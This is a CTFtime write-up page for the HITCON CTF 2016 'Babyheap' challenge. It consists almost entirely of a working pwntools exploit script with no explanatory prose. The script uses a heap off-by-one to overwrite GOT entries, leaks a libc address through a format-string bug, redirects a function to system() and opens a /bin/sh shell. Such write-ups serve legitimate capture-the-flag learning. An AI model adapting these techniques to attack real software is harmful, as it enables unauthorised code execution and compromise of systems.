CTFtime.org / HITCON CTF 2016 Quals / Babyheap / Writeup

```python
from pwn import *
from sys import argv

context(os='linux', arch='amd64', log_level='debug')
FILE_NAME = './babyheap'
binary = ELF(FILE_NAME)

if len(argv) > 1:
if argv[1][0] == 'd':
gdb_cmd = """
# menu
deactive alarm
b * 0x400c38
# New
b * 0x400cfb
# Del
b * 0x400d02
# Edit
b * 0x400d0e
# name on malloc
b * 0x4009f9
# content on malloc
b * 0x400a5e
# last atoi
b *0x400954
c
"""
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
r = gdb.debug([FILE_NAME], gdb_cmd)
else:
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
r = process(FILE_NAME)

def New(size, content, name):
r.sendafter("choice:", "1")
r.sendafter("Size :", str(size))
r.sendafter("Content:", content)
r.sendafter("Name:", name)

def Delete():
r.sendafter("choice:", "2")

def Edit(content):
r.sendafter("choice:", "3")
r.sendafter("Content:", content)

def Exit(yn):
r.sendafter("choice:", "4")
r.sendafter("Really? (Y/n)", yn)

def main():
# input buffering
payload = b"n"
payload += b"A" * (0x1000 - 0x19)
payload += p64(0x50)
Exit(payload)

payload = p64(0)
payload += p64(0x51)
New(0x30, payload, 'X' * 0x8) #Off-by-one

Delete()

got_exit = 0x602020
payload = b'AAAAAAAA' * 6
payload += p64(got_exit)
New(0x48, payload, 'A')

# edit got 1
payload = p64(binary.plt[b"alarm"] + 6)
payload += p64(binary.plt[b"read"] + 6)
payload += p64(binary.plt[b"puts"] + 6)
payload += p64(0xdeadbeef)
payload += p64(binary.plt[b"printf"] + 6)
payload += p64(binary.plt[b"alarm"] + 6)
payload += p64(binary.plt[b"read"] + 6)
payload += p64(0xdeadbeef)
payload += p64(0xdeadbeef)
payload += p64(0xdeadbeef)
payload += p64(0xdeadbeef)
payload += p64(binary.plt[b"printf"] + 6)
Edit(payload)

# fsb
payload = b"%19$p!"
r.sendafter("choice:", payload)
leak = r.recvuntil(b"!", drop=True)

addr_libc_start_main = int(leak, 16) - 240
libc_base = addr_libc_start_main - libc.symbols[b"__libc_start_main"]
addr_system = libc_base + libc.symbols[b"system"]
log.info("leak ==> {}".format(leak))
log.info("system ==> {0:x}".format(addr_system))

r.recv()
# edit got 2
payload = p64(binary.plt[b"alarm"] + 6)
payload += p64(binary.plt[b"read"] + 6)
payload += p64(binary.plt[b"puts"] + 6)
payload += p64(0xdeadbeef)
payload += p64(binary.plt[b"printf"] + 6)
payload += p64(binary.plt[b"alarm"] + 6)
payload += p64(binary.plt[b"read"] + 6)
payload += p64(0xdeadbeef)
payload += p64(0xdeadbeef)
payload += p64(0xdeadbeef)
payload += p64(0xdeadbeef)
payload += p64(addr_system)

r.send(b"AAA") # menu(printf("AAA") == 3)
r.sendafter("Content:", payload)
r.sendafter("choice:", b"/bin/sh\x00")
r.interactive()

if __name__ == '__main__':
main()

```

Babyheap

Comments

Sign in with